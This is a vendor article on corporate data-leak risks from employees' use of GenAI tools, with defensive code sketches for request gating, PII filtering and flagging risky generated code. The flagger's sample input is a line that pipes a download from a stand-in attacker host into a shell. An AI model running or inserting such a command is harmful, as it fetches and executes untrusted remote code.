
Rising Enterprise GenAI Use Could Pose Risks for Corporate Data

The enterprise’s love affair with third-party GenAI productivity tools is going strong, even as the increased usage adds pressure to already stretched corporate security teams. In the United States, around 75 percent of leaders and managers and 51 percent of frontline employees use GenAI for productivity.[1] Employees typically access GenAI tools through a browser, using the technology for productivity, research, and content creation. Security issues arise when a GenAI platform uses the information it receives to train itself and to answer other users’ queries. With this in mind, corporate IT departments should review GenAI security now, especially with Gartner predicting that by 2030 more than 40 percent of global organizations will suffer security incidents due to AI tools.[2]

Browsers, Third-Party Tools, and Data Leaks

The browser powers much of enterprise GenAI use because it is an easy-to-use gateway to the Internet. But the browser typically sits outside enterprise-grade protections such as endpoint security and data loss prevention (DLP) controls. When it comes to third-party GenAI tools, it helps to picture the browser operating in an information Wild West, without the strictness those controls would normally enforce.

The typical corporate user does not intend to expose corporate data, but rarely understands where the inputted information travels. GenAI platforms are designed to keep learning, so any data they receive may be used for self-training and may surface in answers to other users’ queries. GenAI does not differentiate between “safe” and sensitive inputs: customer or employee PII, intellectual property, and insider corporate knowledge are all treated as ordinary information.

GenAI Data Leaks in the Real World    

In early 2023, Amazon’s internal legal team noticed that ChatGPT’s answers to coding questions closely resembled problems given to prospective Amazon employees. The company’s employees had been pasting data snippets into ChatGPT for tasks like debugging or confirming a correct answer; once submitted, that data was available to the service, including in responses to queries from outside the company. Similarly in 2023, Samsung experienced three leaks of confidential information as a result of employees using GenAI. The exposed information included source code, detailed meeting notes, and hardware data.

In response, Amazon immediately instituted a policy prohibiting the sharing of confidential information with third-party GenAI tools. Samsung banned GenAI tools for employees, and as of December 2025 only certain Samsung departments can use third-party GenAI. Both companies discovered that once information has been inputted into a third-party GenAI service, it is very difficult to delete.

The Rise of Shadow GenAI 

Many companies may not have the luxury of discovering and stopping such leaks because they are not aware that their employees are using GenAI at all. It is estimated that workers in 90 percent of companies use chatbots without letting their IT departments know.[3] Beyond data appearing on GenAI platforms, shadow AI use can leave a company vulnerable to more intricate attacks, such as data poisoning, prompt injection, and phishing. Shadow AI also carries compliance risks: the lack of governance leaves companies exposed to fines for violating data privacy regulations.

Malware and Phishing

Threat actors can use GenAI tools to generate scripts, obfuscate code, or craft social engineering content that helps them discover network vulnerabilities. There have not yet been many documented cases of malware spreading through GenAI use, but such incidents are expected to rise in the coming years.

GenAI can also enable hyper-personalized phishing by generating context-aware emails, deepfakes, or even voice clones. This makes it harder for employees to spot fakes, leading to potential unauthorized access to networks or intellectual property.

The Best Company Response to GenAI Use

There are steps a company can take to realize the benefits of third-party GenAI tools while still keeping its data and compliance obligations in check.

Establish Policies

First, the company should develop and enforce policies on GenAI platform use. The guidelines should specify allowable platforms, the types of data that can be input, and the departments that are permitted to use these tools. The “rulebook” should also address regulatory compliance, with input from the legal and security teams on best practices.

Build a Zero-Trust Architecture

A company should consider a zero-trust architecture to secure access to GenAI, especially browser-based tools. This could include multi-factor authentication, least-privilege access, data encryption, and real-time monitoring to prevent data loss or unauthorized sharing. The ability to block risky interactions, such as large data uploads, should be enabled. Finally, the company should conduct regular audits of all data flows.
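As a rough illustration of the zero-trust idea, the sketch below shows a proxy-side gate that denies unauthenticated requests by default and blocks oversized prompt payloads before they leave the network. The function name, the authentication flag, and the byte threshold are all hypothetical placeholders, not a real product API.

```python
# Minimal sketch, assuming a proxy that sees each outbound GenAI request.
# MAX_PROMPT_BYTES is an illustrative upload limit, not a recommended value.

MAX_PROMPT_BYTES = 16_384

def gate_genai_request(user_authenticated: bool, payload: str) -> bool:
    """Return True if the request may be forwarded to the GenAI service."""
    if not user_authenticated:
        return False  # least-privilege: deny by default
    if len(payload.encode("utf-8")) > MAX_PROMPT_BYTES:
        return False  # block large data uploads
    return True

print(gate_genai_request(True, "short debugging question"))  # True
print(gate_genai_request(True, "x" * 20_000))                # False
```

In a real deployment, the same check would sit in a secure-browser extension or forward proxy, alongside logging so that blocked interactions feed the audit trail mentioned above.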

Start Classifying Sensitive Data 

A company should classify sensitive information and implement controls to prevent it from being included in GenAI prompts. Similarly, models, datasets, and integrations should be monitored to ensure no data poisoning has taken place, for example from bad commands copied out of GenAI responses into internal systems.
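One way to picture a prompt-level control is a simple pattern check that flags common PII before a prompt is sent. The patterns below (an email address and a US SSN-style number) are illustrative assumptions; real DLP classification is far richer than two regexes.

```python
import re

# Hypothetical sketch of a prompt filter. These two patterns are
# examples only, not a complete sensitive-data taxonomy.
PII_PATTERNS = {
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"),
    "ssn":   re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}

def contains_pii(prompt: str) -> list[str]:
    """Return the names of PII categories detected in a prompt."""
    return [name for name, pat in PII_PATTERNS.items() if pat.search(prompt)]

print(contains_pii("Summarize this meeting"))  # []
print(contains_pii("Contact jane.doe@example.com, SSN 123-45-6789"))
# ['email', 'ssn']
```

A gateway could refuse or redact any prompt for which this check returns a non-empty list, and log the event for the security team.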

Monitor AI Outputs and Mitigate Malware/Phishing Risks

Requiring reviews of AI-generated code or content for malware or inaccurate information before it is used can help mitigate threats.
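A lightweight first pass on such reviews can be automated: the sketch below flags a few risky constructs in AI-generated Python snippets so a human reviewer knows where to look. The deny-list is an illustrative assumption, not a malware scanner.

```python
# Hypothetical pre-review check for AI-generated Python snippets.
# The token list is illustrative; a real pipeline would use proper
# static analysis rather than substring matching.
RISKY_TOKENS = ("eval(", "exec(", "os.system(", "subprocess", "base64.b64decode")

def flag_risky_code(snippet: str) -> list[str]:
    """Return the risky tokens found, so a reviewer can inspect them."""
    return [tok for tok in RISKY_TOKENS if tok in snippet]

generated = "import os\nos.system('curl http://attacker.example | sh')"
print(flag_risky_code(generated))  # ['os.system(']
```

Anything flagged would be routed to a human review before the code reaches a repository or production system.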

Make It a Team Effort

The best GenAI protection will come from policies and practices developed across IT, security, business, and legal teams. The policies should be rolled out and updated with employee training.

Scale Carefully

Once a company has a good monitoring and response process in place, it can start to scale its GenAI use, keeping an eye on emerging threats as it does.

By understanding the security risks of third-party GenAI tools, monitoring for shadow use, and building a comprehensive usage policy, a company can be more confident in its use of GenAI. The goal is to stay aware of emerging threats and to ensure its practices are aligned with data safety and governance mandates.

References:

[1] https://www.bcg.com/publications/2025/ai-at-work-momentum-builds-but-gaps-remain

[2] https://www.infosecurity-magazine.com/news/gartner-40-firms-hit-shadow-ai/

[3] https://fortune.com/2025/08/19/shadow-ai-economy-mit-study-genai-divide-llm-chatbots/

Bio

Zbyněk Sopuch is the CTO of Safetica, a global leader in data loss prevention and insider risk management, protecting close to 1 million devices in 120 countries. www.safetica.com

About Safetica

Safetica is a global leader in Intelligent Data Security, trusted by organizations in more than 120 countries. Its AI-powered platform unifies data protection, insider risk management, compliance readiness, and data discovery across on-premises and cloud environments. Designed to protect sensitive information without disrupting business operations, Safetica helps companies stay compliant, reduce insider risk, and safeguard data wherever work happens.

Learn more at www.safetica.com
